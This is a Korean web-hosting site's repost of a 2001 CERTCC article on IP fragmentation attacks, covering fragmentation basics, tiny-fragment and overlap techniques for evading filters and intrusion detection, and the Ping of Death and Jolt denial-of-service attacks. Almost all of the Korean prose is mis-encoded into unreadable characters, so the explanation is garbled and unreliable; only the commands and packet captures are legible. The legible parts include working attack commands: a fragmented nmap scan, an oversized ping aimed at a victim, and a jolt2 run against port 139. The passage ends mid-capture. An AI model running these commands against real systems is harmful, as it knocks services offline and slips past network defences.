1day/¿øµ¥ÀÌ/ÇÏ·ç/ÀÏ¿ëÁ÷/È£½ºÆÃ/¼­¹öÈ£½ºÆÃ/ÀÚ·á½Ç/°­ÁÂ/Ä¿¹Â´ÏƼ
Be happy 1day
HOME
ȸ¿ø·Î±×ÀÎ
ID:
PW:

     0 ºÐ
     4 ºÐ
 
À¥È£½ºÆÃ
À¥È£½ºÆà ½Åû¹æ¹ý
¼­ºñ½ºÀÌ¿ë¾à°ü
½Åû¸®½ºÆ® *
ÀԱݸ®½ºÆ® *
°í°´Áö¿ø FAQ
¹®ÀÇÇϱâ
°í°´Áö¿ø
ÆÄÀÏÁú¶ó¼³Á¤(ftp)
pop3¶õ?
SMTP¶õ?
¾Æ¿ô·è¼¼Æùý
³×ÀÓ¼­¹ö
   1Â÷ : ns1.1day.co.kr
..........222.234.222.191
   2Â÷ : ns2.1day.co.kr
..........222.234.223.192
°èÁ¹øÈ£ ¾È³»
....¿ì¸®ÀºÇà(¿øµ¥ÀÌ)
....1005-902-808446
À̸ÞÀÏ ¹®ÀÇ
1day@1day.co.kr
ÀÚ·á½Ç/°­ÁÂ
HTML ű×
ÀÚ¹Ù½ºÅ©¸³Æ®°­ÁÂ
¸®´ª½º±âÃÊ°­ÁÂ
¸®´ª½ºÁß±Þ°­ÁÂ
 


IP FragmentationÀ» ÀÌ¿ëÇÑ °ø°Ý±â¼úµé
 1day  | 2004¡¤01¡¤14 19:55 | HIT : 40,194 | VOTE : 13,004 |

 

IP FragmentationÀ» ÀÌ¿ëÇÑ °ø°Ý±â¼úµé

 

2001. 3. 17
Á¤Çöö, hcjung@certcc.or.kr

1. °³¿ä

IP FragmentationÀº À̱âÁ¾ ³×Æ®¿öÅ© ȯ°æ¿¡¼­ IP ÆÐŶÀÇ È¿À²ÀûÀÎ Àü¼ÛÀ» º¸ÀåÇØÁÖ°í ÀÖÁö¸¸, ¸î°¡Áö º¸¾È ¹®Á¦Á¡À» °¡Áö°í ÀÖ´Ù.

Ping of Death, teardrop µîÀÇ °ø°ÝÀº ºñÁ¤»óÀûÀÎ fragmentµéÀ» ÀçÁ¶ÇÕ(reassemble)ÇÏ´Â °úÁ¤¿¡¼­ ½Ã½ºÅÛÀÌ Á¤ÁöµÇ°Å³ª ÀçºÎÆÃµÉ ¼ö ÀÖ´Ù. ÇÏÁö¸¸ ÃÖ±Ù IP FragmentationÀ» ÀÌ¿ëÇÑ ¼­ºñ½º°ÅºÎ°ø°Ý ¿Ü¿¡ À̸¦ ÀÌ¿ëÇÏ¿© ÆÐŶ ÇÊÅ͸µ Àåºñ³ª ³×Æ®¿öÅ© ±â¹ÝÀÇ Ä§ÀÔŽÁö½Ã½ºÅÛÀ» ¿ìȸÇÒ ¼ö ÀÖ´Â ¹®Á¦Á¡ÀÌ ´ëµÎµÇ°í ÀÖ´Ù. ÀϺΠ¶ó¿ìÅͳª ħÀÔÂ÷´Ü½Ã½ºÅÛ ±×¸®°í ³×Æ®¿öÅ© ±â¹ÝÀÇ Ä§ÀÔŽÁö½Ã½ºÅÛµéÀº ÆÐŶ ÀçÁ¶ÇÕ ±â´ÉÀ» Á¦°øÇÏ°í ÀÖÁö ¾Ê¾Æ °ø°ÝÀÚ°¡ °ø°Ý ÆÐŶÀ» ´Ù¼öÀÇ µ¥ÀÌÅͱ׷¥À¸·Î ÂÉ°³¼­ °ø°ÝÇÒ °æ¿ì À̸¦ ŽÁöÇϰųª Â÷´ÜÇÏÁö ¸øÇÏ´Â °æ¿ì°¡ ÀÖ´Ù. º» °í¿¡¼­´Â ¸ÕÀú IP fragmentationÀÇ ±âº»ÀûÀÎ °³³äÀ» ¼Ò°³Çϵµ·Ï ÇÏ°í, ÀÌ·¯ÇÑ IP FragmentationÀ» ÀÌ¿ëÇÑ ¼­ºñ½º°ÅºÎ°ø°Ý°ú ħÀÔŽÁö½Ã½ºÅÛÀÇ Å½Áö ruleÀ» ¿ìȸÇÏ´Â °ø°Ý±â¼úµé¿¡ ´ëÇÏ¿© ¾Ë¾Æº¸±â·Î ÇÑ´Ù.

2. IP FragmentationÀÇ ÀÌÇØ

IP ÇÁ·ÎÅäÄÝÀº IP ÆÐŶÀ» ¸î °³ÀÇ ÀÛÀº ÆÐŶÀ¸·Î ³ª´©¾î¼­ Àü¼ÛµÇ°í ¸ñÀûÁö ½Ã½ºÅÛ¿¡¼­ ÀçÁ¶ÇյǴ °ÍÀ» Çã¿ëÇÑ´Ù. ÀÌ °úÁ¤ÀÌ fragmentationÀ̶ó°í ºÒ¸®¸ç, ¼­·Î ´Ù¸¥ ÃÖ´ë ÆÐŶ »çÀÌÁîÀÇ Á¦ÇÑÀ» °¡Áø À̱âÁ¾ÀÇ Àü¼Û¸Åü¿¡¼­µµ IP µ¥ÀÌÅͱ׷¥À» Àü¼Û°¡´ÉÇÏ°Ô ÇÑ´Ù.

IP FragmentationÀº IP µ¥ÀÌÅͱ׷¥ÀÌ ³×Æ®¿öÅ©¸¦ ÅëÇØ Àü¼ÛµÉ ¶§, Àü¼ÛµÇ´Â IP µ¥ÀÌÅͱ׷¥ÀÇ Å©±â°¡ ÇØ´ç Àü¼Û ¸Åü¿¡¼­ Àü¼ÛµÉ ¼ö ÀÖ´Â ÃÖ´ë Å©±â Áï, MTU(Maximum Transmission Unit)º¸´Ù Ŭ °æ¿ì ¹ß»ýÇÑ´Ù. ¿¹¸¦µé¾î Ethernet¿¡¼­ Àü¼Û°¡´ÉÇÑ IP µ¥ÀÌÅͱ׷¥ÀÇ ÃÖ´ë Å©±â Áï MTU´Â 1500¹ÙÀÌÆ®ÀÌ´Ù. ¸¸¾à µ¥ÀÌÅͱ׷¥ÀÌ 1500¹ÙÀÌÆ®º¸´Ù Å©°í, Ethernet ³×Æ®¿öÅ©¸¦ Åë°úÇؾßÇÑ´Ù¸é ±× µ¥ÀÌÅͱ׷¥Àº fragmentationÀÌ ÇÊ¿äÇÏ°Ô µÈ´Ù. ÀÌó·³ fragmentationÀº Áö±ØÈ÷ ÀϹÝÀûÀÌ°í Á¤»óÀûÀÎ À̺¥Æ®ÀÌÁö¸¸, ºñÁ¤»óÀûÀÎ fragment¸¦ ¹ß»ý½ÃÄÑ ¼­ºñ½º°ÅºÎ°ø°Ý¿¡ ÀÌ¿ëÇϱ⵵ ÇÏ°í, fragmentationÀ» ó¸®ÇÏÁö ¾Ê´Â ¶ó¿ìÅͳª ħÀÔŽÁö½Ã½ºÅÛÀ» ÇÇÇϱâ À§ÇÑ ¸ñÀûÀ¸·Î °íÀÇ·Î fragmentationÀ» ÀÌ¿ëÇϱ⵵ ÇÑ´Ù.

°¢ fragmentµéÀº ¸ñÀûÁö¿¡ µµÂøÇÏ¿© fragmentµÇ±â ÀüÀÇ »óÅ·ΠÀçÁ¶ÇյDZâ À§ÇÏ¿© ´ÙÀ½ÀÇ Á¤º¸µéÀ» °¡Áö°í ÀÖ´Ù.

⼒ °¢ fragment´Â ÇϳªÀÇ µ¿ÀÏÇÑ fragment ½Äº°¹øÈ£¸¦ ÀÌ¿ëÇÏ¿© ÀçÁ¶ÇյǴµ¥, ÀÌ ½Äº°¹øÈ£´Â IP Çì´õÀÇ 16ºñÆ® Çʵå·Î½á "IP identification number" ¶Ç´Â "fragment ID"·Î ºÒ¸°´Ù.

⼒ °¢ fragment´Â ¿ø·¡ fragmentµÇ±â ÀÌÀüÀÇ ÆÐŶ¿¡¼­ÀÇ À§Ä¡ Áï "fragment offset"À» °¡Áø´Ù.

⼒ °¢ fragment´Â ±× fragmentÀÇ µ¥ÀÌÅÍ ±æÀ̸¦ °¡Áø´Ù. ¿©±â¼­ IP Çì´õ 20byte´Â µ¥ÀÌÅÍ ±æÀÌ¿¡¼­ Á¦¿ÜµÈ´Ù. Áï, EthernetÀÇ MTUÀÎ 1500¹ÙÀÌÆ®°¡ Àü¼ÛµÉ ¶§ µ¥ÀÌÆ®±æÀÌ´Â 1480(1500-20)¹ÙÀÌÆ®·Î Ç¥½ÃµÈ´Ù.

⼒ ¸¶Áö¸·À¸·Î °¢ fragment´Â ÇöÀç fragment¿¡ Ãß°¡ÀûÀÎ fragmentµéÀÌ ÀÖÀ» °æ¿ì ME(More Fragment) flag¸¦ 1·Î ¼³Á¤µÈ´Ù.

IP FragmentÀÇ ¿ø¸®¸¦ ÀÌÇØÇϱâ À§ÇÏ¿© 4,000¹ÙÀÌÆ®ÀÇ ICMP µ¥ÀÌÅÍ°¡ Ethernet »ó¿¡¼­ Àü¼ÛµÉ ¶§ ¾î¶»°Ô framentationµÇ´ÂÁö »ìÆ캸±â·Î ÇÏÀÚ.

¿ì¼± 4000¹ÙÀÌÆ®ÀÇ ICMP µ¥ÀÌÅ͸¦ ¼Û½ÅÇÏ¿© º»´Ù.(ÀϹÝÀûÀÎ ping ÆÐŶÀº 56¹ÙÀÌÅÍÀÇ ICMP µ¥ÀÌÅ͸¦ Àü¼ÛÇÏÁö¸¸ -s ¿É¼ÇÀ» ÀÌ¿ëÇÏ¿© ICMP µ¥ÀÌÅÍ°¡ fragmentµÇµµ·Ï ÃæºÐÈ÷ Å©°ÔÇÑ´Ù.)

[root@linux80 /root]# ping -s 4000 172.16.2.34
PING 172.16.2.34 (172.16.2.34): 4000 data bytes
4008 bytes from 172.16.2.34: icmp_seq=0 ttl=254 time=20.7 ms
4008 bytes from 172.16.2.34: icmp_seq=1 ttl=254 time=20.1 ms
...

À̶§ tcpdump¸¦ ÀÌ¿ëÇÏ¿© ÆÐŶÀ» ¸ð´ÏÅ͸µÇÏ¸é ´ÙÀ½°ú °°´Ù.

20:55:56.548630 linux80.kisa.or.kr > insecure.kisa.or.kr: (frag 30338:1048@2960)
20:55:56.558095 linux80.kisa.or.kr > insecure.kisa.or.kr: (frag 30338:1480@1480+)
20:55:56.565466 linux80.kisa.or.kr > insecure.kisa.or.kr: icmp: echo request (frag 30338:1480@0+)

Ethernet ³×Æ®¿öÅ©¸¦ ÅëÇÏ¿© Àü¼ÛµÇ±â ÀüÀÇ µ¥ÀÌÅͱ׷¥Àº 20¹ÙÀÌÆ®ÀÇ IPÇì´õ¿Í 8¹ÙÀÌÆ®ÀÇ ICMP Çì´õ, ±×¸®°í 4000¹ÙÀÌÆ®ÀÌ ICMP µ¥ÀÌÅ͸¦ °¡Áø ÃÑ 4028¹ÙÀÌÆ®ÀÇ µ¥ÀÌÅͱ׷¥ÀÌ´Ù. ÇÏÁö¸¸ EthernetÀ» ÅëÇÏ¿© Àü¼ÛµÇ±â À§Çؼ­´Â EthernetÀÇ MTU Áï 1500¹ÙÀÌÆ®¸¦ ³ÑÀ» ¼ö ¾øÀ¸¹Ç·Î 1500¹ÙÀÌÆ® ¶Ç´Â ±×º¸´Ù ÀÛÀº fragment·Î ÂÉ°³¾îÁ®¼­ Àü¼ÛµÇ°Ô µÈ´Ù. ´ÙÀ½ ±×¸²Àº EthernetÀ» ÅëÇØ Àü¼ÛµÇ´Â 3°³ÀÇ fragment¸¦ µµ½ÄÈ­ÇÑ °ÍÀÌ´Ù.

Top

tcpdump¿¡ ÀÇÇØ ¸ð´ÏÅ͸µµÈ °á°ú¿Í À§ ±×¸²ÀÇ µµ½ÄÈ­ÇÑ °¢ fragmentÀÇ ³»¿ëÀ» °°ÀÌ º¸¸é fragment ÀÌÇØ¿¡ µµ¿òÀÌ µÉ °ÍÀÌ´Ù.

¿ì¼± ù ¹ø° fragment´Â 20¹ÙÀÌÆ®ÀÇ IP Çì´õ¿Í 8¹ÙÀÌÆ®ÀÇ ICMP Çì´õ, ±×¸®°í 1472(=1500-20-8)¹ÙÀÌÆ®ÀÇ ICMP µ¥ÀÌÅÍ·Î ±¸¼ºµÇ¾î ÀÖ´Ù.

IP Çì´õ¿¡´Â ´ÙÀ½ÀÇ Á¤º¸µéÀ» °¡Áø´Ù.

Protocol = ICMP
Fragment ID = 30338
More Fragments Flag = 1
Fragment Offset = 0
Data Length = 1480

¾Æ·¡ÀÇ tcpdump¿¡ ÀÇÇØ ¸ð´ÏÅ͸µµÈ ù fragmentÀÇ ³»¿ë¿¡¼­ 30338Àº fragment ID, 1480Àº Data Length, 0´Â Fragment Offset, +´Â MF flag°¡ 1·Î ¼ÂÆõǾî ÀÖÀ½À» º¸¿©ÁØ´Ù.

Top

IP Çì´õ¿¡ ÀÇÇØ Ä¸½¶È­µÈ µ¥ÀÌÅÍ´Â TCP, UDP, ¶Ç´Â ICMP¿Í °°Àº IP ÇÁ·ÎÅäÄݵéÀÌ µÉ ¼ö ÀÖ´Ù. ¿©±â¼­´Â ICMP ÆÐŶÀ» º¸³»°í ÀÖÀ¸¸ç, tcpdump¿¡¼­ ICMP Çì´õ Á¤º¸¸¦ ÅëÇÏ¿© ÀÌ ÆÐŶÀÌ ICMP echo request¶ó´Â °ÍÀ» Ãâ·ÂÇÏ¿© ÁÖ°í ÀÖ´Ù.

µÎ ¹ø° fragment´Â 20¹ÙÀÌÆ®ÀÇ IP Çì´õ¿Í 1480¹ÙÀÌÆ®ÀÇ ICMP µ¥ÀÌÅÍ·Î ±¸¼ºµÇ¾î ÀÖ´Ù. ¸ðµç fragment¿¡´Â 20¹ÙÀÌÆ®ÀÇ IP Çì´õ¸¦ Æ÷ÇÔÇϴµ¥, µÎ¹ø° fragmentÀÇ IP Çì´õ¿¡´Â ´ÙÀ½ÀÇ Á¤º¸µéÀ» °¡Áö°í ÀÖ´Ù.

Protocol = ICMP
Fragment ID = 30338
More Fragments Flag = 1
Fragment Offset = 1480
Data Length = 1480

Fragment OffsetÀº 1480À» °¡¸®Å°°í ÀÖÀ¸¸ç, ù ¹ø° fragment¿Í´Â ´Þ¸® ICMP Çì´õ¸¦ °¡Áö°í ÀÖÁö ¾Ê¾Æ ICMP type Á¤º¸¸¦ ¾Ë ¼ö ¾ø´Ù.

cpdump¿¡¼­ ù ¹ø° ÆÐŶ¿¡¼­ ³ª¿Ô´ø "ICMP echo request" ÆÐŶÀ̶ó´Â °ÍÀÌ µÎ ¹ø° fragmentºÎÅÍ´Â º¸ÀÌÁö ¾Ê´Â °ÍÀ» ¾Ë ¼ö ÀÖ´Ù. TCP³ª UDP ÆÐŶÀÎ °æ¿ì ¸ñÀûÁö Æ÷Æ®¹øÈ£ Á¤º¸µµ °¡ÁöÁö ¾Ê´Â´Ù. ÀÌó·³ ¿ÀÁ÷ ù ¹ø° fragment¿¡¸¸ TCP, UDP, ¶Ç´Â ICMP Çì´õ°¡ Æ÷ÇԵǾî ÀÖ¾î ÆÐŶ ÇÊÅ͸µ ÀåÄ¡¿¡¼­ ù ¹ø° fragment¸¸ Â÷´ÜµÇ´Â °æ¿ì°¡ ¸¹´Ù. µû¶ó¼­ fragment ID¸¦ ÀÌ¿ëÇÏ¿© °¢ ¼¼¼ÇÀÇ stat¸¦ À¯ÁöÇÏ¿©¾ß ÇÏ´Â ºÎ´ãÀÌ ÀÖ´Ù. Á»´õ Áö´ÉÀûÀÎ ÆÐŶ ÇÊÅ͸µ ÀåÄ¡ÀÎ °æ¿ì´Â Â÷´ÜµÈ ù ¹ø° fragmentÀÇ ID¸¦ °¡Áø ¸ðµç fragmentµéÀ» Â÷´ÜÇÒ ÇÊ¿ä°¡ ÀÖ´Ù.

¸¶Áö¸· fragment´Â ¿ª½Ã 20¹ÙÀÌÆ®ÀÇ IP Çì´õ¿Í ³ª¸ÓÁö ICMP µ¥ÀÌÅÍ Áï 1048¹ÙÀÌÆ®ÀÇ ICMP µ¥ÀÌÅÍ·Î ±¸¼ºµÇ¾î ÀÖ´Ù. IP Çì´õ¿¡´Â ´ÙÀ½ÀÇ Á¤º¸¸¦ °¡Áö°í ÀÖ´Ù.

Protocol = ICMP

Fragment ID = 30338

More Fragments Flag = 0

Fragment Offset = 2960

Data Length = 1048

¿©±â¼­ ´õ ÀÌ»óÀÇ fragment°¡ ¾øÀ¸¹Ç·Î MF flag°¡ 0À¸·Î ¼ÂÆÃµÈ °ÍÀ» º¼ ¼ö ÀÖ´Ù. ±×¸®°í µÎ ¹ø° fragment¿Í ¸¶Âù°¡Áö·Î ICMP Çì´õ°¡ Æ÷ÇÔµÇÁö ¾Ê¾Ò´Ù.

4000¹ÙÀÌÆ®ÀÇ ICMP µ¥ÀÌÅÍ°¡ ³×Æ®¿öÅ©¸¦ ÅëÇØ Àü¼ÛµÉ °æ¿ì MTU¿¡ µû¶ó fragmentµÇ´Â °úÁ¤À» °£´ÜÈ÷ »ìÆ캸¾Ò´Ù.

Top

3. Fragment¸¦ ÀÌ¿ëÇÑ °ø°Ý±â¼úµé

À§¿¡¼­ ¾Ë¾Æº» °Íó·³ fragmentationÀº Å« ÆÐŶÀ» Àü¼ÛÇϱâ À§ÇØ ¹ß»ýµÇ´Â Á¤»óÀûÀÎ °úÁ¤ÀÌÁö¸¸ °ø°ÝÀÚ´Â fragment¸¦ Á¶ÀÛÇÏ¿© ÆÐŶÇÊÅ͸µ Àåºñ³ª ħÀÔÂ÷´Ü½Ã½ºÅÛÀ» ¿ìȸÇϰųª ¼­ºñ½º°ÅºÎ°ø°ÝÀ» À¯¹ß½Ãų ¼ö ÀÖ´Ù.

°¡. Tiny fragment °ø°Ý

Tiny fragment °ø°ÝÀº ÃÖÃÊÀÇ fragment¸¦ ¾ÆÁÖ ÀÛ°Ô ¸¸µé¾î¼­ ³×Æ®¿öÅ© ħÀÔŽÁö½Ã½ºÅÛÀ̳ª ÆÐŶ ÇÊÅ͸µ Àåºñ¸¦ ¿ìȸÇÏ´Â °ø°ÝÀÌ´Ù.

TCP Çì´õ(ÀϹÝÀûÀ¸·Î 20¹ÙÀÌÆ®)°¡ 2°³ÀÇ fragment¿¡ ³ª´µ¾îÁú Á¤µµ·Î ÀÛ°Ô ÂÉ°³¼­ ¸ñÀûÁö TCP Æ÷Æ®¹øÈ£°¡ ù ¹ø° fragment¿¡ À§Ä¡ÇÏÁö ¾Ê°í µÎ ¹ø° fragment¿¡ À§Ä¡Çϵµ·Ï ÇÑ´Ù.

ÆÐŶÇÊÅ͸µ Àåºñ³ª ħÀÔŽÁö½Ã½ºÅÛÀº ÇÊÅ͸µÀ» °áÁ¤Çϱâ À§ÇØ Æ÷Æ®¹øÈ£¸¦ È®ÀÎÇϴµ¥ Æ÷Æ®¹øÈ£°¡ Æ÷ÇÔµÇÁö ¾ÊÀ» Á¤µµ·Î ¾ÆÁÖ ÀÛ°Ô(tiny) fragmentµÈ ù ¹ø° fragment¸¦ Åë°ú½ÃŲ´Ù. ¶ÇÇÑ ½ÇÁ¦ Æ÷Æ®¹øÈ£°¡ Æ÷ÇԵǾî ÀÖ´Â µÎ ¹ø° fragment´Â ¾Æ¿¹ °Ë»çµµ ÇÏÁö ¾Ê°í Åë°ú½ÃŲ´Ù. ±× °á°ú º¸È£µÇ¾î¾ßÇÒ ¸ñÀûÁö ¼­¹ö¿¡¼­´Â ÀÌ ÆÐŶµéÀÌ ÀçÁ¶ÇյǾîÁ® °ø°ÝÀÚ°¡ ¿øÇÏ´Â Æ÷Æ®ÀÇ ÇÁ·Î±×·¥À¸·Î ¹«»çÈ÷ ¿¬°áµÉ ¼ö ÀÖ´Ù. ÀÌ·± ¹æ¹ýÀ¸·Î ÆÐŶ ÇÊÅ͸µ¿¡¼­ Â÷´ÜµÇ¾î¾ß ÇÏ´Â ÆÐŶÀ» Åë°ú½Ãų ¼öµµ ÀÖ°í, ħÀÔŽÁö½Ã½ºÅÛ¿¡¼­ ºñÁ¤»óÀûÀÎ Á¢¼ÓÀ¸·Î °æº¸µÇ¾îÁ®¾ß ÇÏÁö¸¸ ÀüÇô ŽÁöµÇÁö ¾Ê°Ô ÇÒ ¼öµµ ÀÖ´Ù. ¾î¶² ÆÐŶ ÇÊÅ͸µ ÀåºñµéÀº TCP Çì´õÀÇ Æ÷Æ®¹øÈ£°¡ Æ÷ÇÔµÇÁö ¾ÊÀ» Á¤µµ·Î ÀÛÀº ù ¹ø° fragment´Â drop½ÃÅ°±âµµ ÇÑ´Ù.

Tiny fragment °ø°ÝÀº Àß ¾Ë·ÁÁø ½ºÄµ ÅøÀÎ nmap¿¡¼­µµ °ø°ÝÀÌ °¡´ÉÇÏ´Ù.
nmap¿¡ -f ¿É¼ÇÀ» »ç¿ëÇÒ °æ¿ì TCP Çì´õ¸¦ ¸î °³ÀÇ fragment·Î ³ª´©¾î¼­ ½ºÄµÇÑ´Ù.
[root@linux80 /root]# nmap -f -sS -p 23 172.16.2.34
Starting nmap V. 2.54BETA1 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on insecure.kisa.or.kr (172.16.2.34):
Port State Service
23/tcp open telnet
Nmap run completed -- 1 IP address (1 host up) scanned in 0 seconds

À̶§ tcpdump¸¦ ÀÌ¿ëÇÏ¿© ÆÐŶÀ» ¸ð´ÏÅ͸µ ÇÑ °á°úÀÌ´Ù.

02:57:25.633885 truncated-tcp 16 (frag 19350:16@0+)
02:57:25.634375 linux80.kisa.or.kr > insecure.kisa.or.kr: (frag 19350:4@16)
02:57:25.635071 insecure.kisa.or.kr.telnet > linux80.kisa.or.kr.34326: S 1348389859:1348389859(0) ack 3078700240 win 32696 <mss 536> (DF)
02:57:25.639159 linux80.kisa.or.kr.34326 > insecure.kisa.or.kr.telnet: R 3078700240:3078700240(0) win 0

tcpdumpÀÇ °á°ú·Î TCP SYN ½ºÄµ Áï half-open ½ºÄµÀÌ ¼öÇàµÈ °ÍÀ» ¾Ë ¼ö ÀÖ´Ù. ±×·±µ¥ ù ¹ø° fragment »çÀÌÁî´Â 16¹ÙÀÌÆ®·Î ¾Æ¹«·± ¿É¼ÇÀÌ ¾øÀ» °æ¿ìÀÇ TCP Çì´õ »çÀÌÁîÀÎ 20¹ÙÀÌÆ®º¸´Ù ÀÛÀº °ÍÀ» º¼ ¼ö ÀÖ´Ù. ±×¸®°í ³ª¸ÓÁö TCP Çì´õ 4¹ÙÀÌÆ®´Â µÎ ¹ø° fragment¿¡ ÀÖ´Ù. ÀϺΠħÀÔŽÁö½Ã½ºÅÛ¿¡¼­´Â ÀÌ·¯ÇÑ fragmentµÈ ½ºÅÚ½º °ø°ÝÀ» ŽÁö ¸øÇÏ´Â °æ¿ìµµ ÀÖ´Ù.

³ª. Fragment Overlap °ø°Ý

Tiny fragment °ø°Ý±â¹ý¿¡ ºñÇØ Á»´õ Á¤±³ÇÑ °ø°ÝÀÌ fragment Overlap °ø°ÝÀÌ´Ù.

°ø°ÝÀÚ´Â °ø°Ý¿ë IP ÆÐŶÀ» À§ÇØ µÎ °³ÀÇ fragment¸¦ »ý¼ºÇÑ´Ù. ù ¹ø° fragment¿¡¼­´Â ÇÊŶ ÇÊÅ͸µ Àåºñ¿¡¼­ Çã¿ëÇÏ´Â http(TCP 80) Æ÷Æ®¿Í °°Àº Æ÷Æ®¹øÈ£¸¦ °¡Áø´Ù. ±×¸®°í, µÎ ¹ø° fragment¿¡¼­´Â offsetÀ» ¾ÆÁÖ ÀÛ°Ô Á¶ÀÛÇؼ­ fragmentµéÀÌ ÀçÁ¶ÇÕµÉ ¶§ µÎ ¹ø° fragment°¡ ù ¹ø° fragmentÀÇ ÀϺκÐÀ» µ¤¾î¾²µµ·Ï ÇÑ´Ù. ÀϹÝÀûÀ¸·Î °ø°ÝÀÚµéÀº ù ¹ø° fragmentÀÇ Æ÷Æ®¹øÈ£°¡ ÀÖ´Â ºÎºÐ±îÁö µ¤¾î¾º¿î´Ù.

IDS¿¡¼­´Â ù ¹ø° fragment´Â Çã¿ëµÈ Æ÷Æ®¹øÈ£À̹ǷΠÅë°ú½ÃÅ°°í, µÎ ¹ø° fragment´Â ÀÌÀü¿¡ ÀÌ¹Ì Çã¿ëµÈ fragmentÀÇ ID¸¦ °¡Áø fragmentÀ̹ǷΠ¿ª½Ã Åë°ú½ÃŲ´Ù.

ÀÌ µÎ °³ÀÇ fragment°¡ ¸ñÀûÁö ¼­¹ö¿¡ µµ´ÞÇÏ¿© ÀçÁ¶ÇյǸé ù ¹ø° fragmentÀÇ Æ÷Æ®¹øÈ£´Â µÎ ¹ø° fragmentÀÇ Æ÷Æ®¹øÈ£·Î overwriteµÇ°í TCP/IP ½ºÅÃÀº ÀÌ ÆÐŶÀ» ÇÊÅ͸µ µÇ¾î¾ßÇÒ Æ÷Æ®ÀÇ ÀÀ¿ëÇÁ·Î±×·¥¿¡ Àü´ÞÇÑ´Ù.

Top

´Ù. IP FragmentationÀ» ÀÌ¿ëÇÑ ¼­ºñ½º°ÅºÎ°ø°Ý

fragmentationÀº ÆÐŶ ÇÊÅ͸µÀ̳ª IDS¸¦ ¿ìȸÇϴµ¥ ÀÌ¿ëÇÒ »Ó¸¸ ¾Æ´Ï¶ó ¼­ºñ½º°ÅºÎ°ø°Ý¿¡µµ ÀÌ¿ëµÉ ¼ö ÀÖ´Ù. ÀÌ¹Ì Àß ¾Ë·ÁÁø Ping of Death °ø°ÝÀ̳ª Teardrop°ú °°Àº °ÍÀÌ fragmentationÀ» ÀÌ¿ëÇÑ ¼­ºñ½º°ÅºÎ°ø°ÝÀ̶ó°í ÇÒ ¼ö ÀÖ´Ù. ÀÌ·¯ÇÑ °ø°ÝµéÀº ÀÌ¹Ì Àß ¾Ë·ÁÁ® ÀÖÀ¸¸ç ¸¹Àº ½Ã½ºÅÛ¿¡¼­ ÀÌ¹Ì ÆÐÄ¡°¡ µÇ±âµµ ÇÏ¿´Áö¸¸ ÃÖ±ÙÀÇ À©µµ¿ìÁî ½Ã½ºÅ۵鵵 ¾ÆÁ÷ ÀÌ Ãë¾àÁ¡À» ¿©ÀüÈ÷ °¡Áö°í Àֱ⵵ ÇÑ´Ù.

(1) Ping of Death, Jolt

ÀÌ °ø°Ý¼ö¹ýÀº Ç¥ÁØ¿¡ ±ÔÁ¤µÈ ±æÀÌ ÀÌ»óÀ¸·Î Å« IP ÆÐŶÀ» Àü¼ÛÇÔÀ¸·Î½á ÀÌ ÆÐŶÀ» ¼ö½Å¹ÞÀº OS¿¡¼­ ÀÌ ºñÁ¤»óÀûÀÎ ÆÐŶÀ» ó¸®ÇÏÁö ¸øÇÔÀ¸·Î½á ¼­ºñ½º°ÅºÎ°ø°ÝÀ» À¯¹ßÇϵµ·Ï ÇÏ´Â ¹æ¹ýÀÌ´Ù.

RFC-791 "Internet Protocol"¿¡ µû¸£¸é Çì´õ¸¦ Æ÷ÇÔÇÑ IP ÆÐŶÀÇ ÃÖ´ë±æÀÌ´Â 65,535(Áï, 2^16-1)±îÁö·Î Á¦ÇѵǾî ÀÖ´Ù. µû¶ó¼­ ½ÇÁ¦·Î ¸¹Àº ½Ã½ºÅÛÀÇ IP ÆÐŶÀ» ó¸®ÇÏ´Â ÄÚµåµéÀÌ ÀÌ°°Àº ÃÖ´ë±æÀ̸¦ °¡Á¤ÇÏ¿© ±¸ÇöµÇ¾î ÀÖ´Ù.

Åë»óÀûÀ¸·Î °ø°ÝÀº °¡Àå ¼Õ½±°Ô IP ÆÐŶÀ¸ Àü¼ÛÇÒ ¼ö ÀÖ´Â ping ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ¿© ¼öÇàµÇ´Âµ¥, ping ÇÁ·Î±×·¥Àº ½ÇÁ¦ ICMP ECHO request ÆÐŶÀ» »ó´ë¹æ¿¡°Ô Àü¼ÛÇÑ´Ù. Åë»óÀûÀ¸·Î IP ÆÐŶÀÇ Çì´õ´Â Ưº°ÇÑ ¿É¼ÇÀ» »ç¿ëÇÏÁö ¾Ê¾ÒÀ» °æ¿ì¿¡ 20¹ÙÀÌÆ®°¡ »ç¿ëµÇ¸ç, ICMP ECHO request ÆÐŶÀº 8¹ÙÀÌÆ®ÀÇ ICMP Çì´õ¸¦ »ç¿ëÇϹǷΠ½ÇÁ¦ µ¥ÀÌÅÍ ±æÀÌÀÇ ÃÖ´ë°ªÀº 65535-20-8=65507¹ÙÀÌÆ®°¡ µÈ´Ù. µû¶ó¼­ ping ÆÐŶÀÇ ÃÖ´ë ±æÀ̸¦ Á¦ÇÑÇÏÁö ¾Ê´Â ½Ã½ºÅÛ¿¡¼­´Â ´ÙÀ½°ú °°Àº °£´ÜÇÑ ¸í·ÉÀ¸·Î °ø°ÝÀ» ¼öÇàÇÒ ¼ö ÀÖ´Ù.

ping -l 65510 victim.host.ip.address

±âÁ¸ÀÇ À©µµ¿ì NT ½Ã½ºÅÛ µî¿¡¼­´Â ÀÌ·¯ÇÑ ¸í·ÉÀÌ Çã¿ëµÇ¾úÁö¸¸ ÃÖ±Ù¿¡´Â ºñÁ¤»óÀûÀ¸·Î Å« ICMP µ¥ÀÌÅ͸¦ ¹ß»ý½ÃÅ°Áö ¸øÇϵµ·Ï ÇÏ°í ÀÖ´Ù. ÇÏÁö¸¸ jolt¶ó´Â °ø°ÝÅøÀ» ÀÌ¿ëÇؼ­ °¡´ÉÇÑ IP µ¥ÀÌÅͱ׷¥ÀÇ Å©±â¸¦ ÃÊ°úÇÏ´Â ÆÐŶÀ» »ý¼ºÇÏ¿© Àü¼ÛÇÏ´Â °ø°ÝÀ» »ç¿ëÇÒ ¼ö ÀÖ´Ù.

[root@insecure DoS]# ./jolt2

Usage: ./jolt2 [-s src_addr] [-p port] dest_addr

Note: UDP used if a port is specified, otherwise ICMP

[root@insecure DoS]# ./jolt2 -p 139 172.16.2.3

°ø°Ý½Ã tcpdump¸¦ ÀÌ¿ëÇÏ¿© ÆÐŶÀ» ĸÃĸµÇÏ¿© º¸¸é ´ÙÀ½°ú °°´Ù.

20:04:51.188599 insecure.kisa.or.kr > 172.16.2.3: (frag 1109:9@65520)
20:04:51.188850 insecure.kisa.or.kr > 172.16.2.3: (frag 1109:9@65520)
20:04:51.189103 insecure.kisa.or.kr > 172.16.2.3: (frag 1109:9@65520)
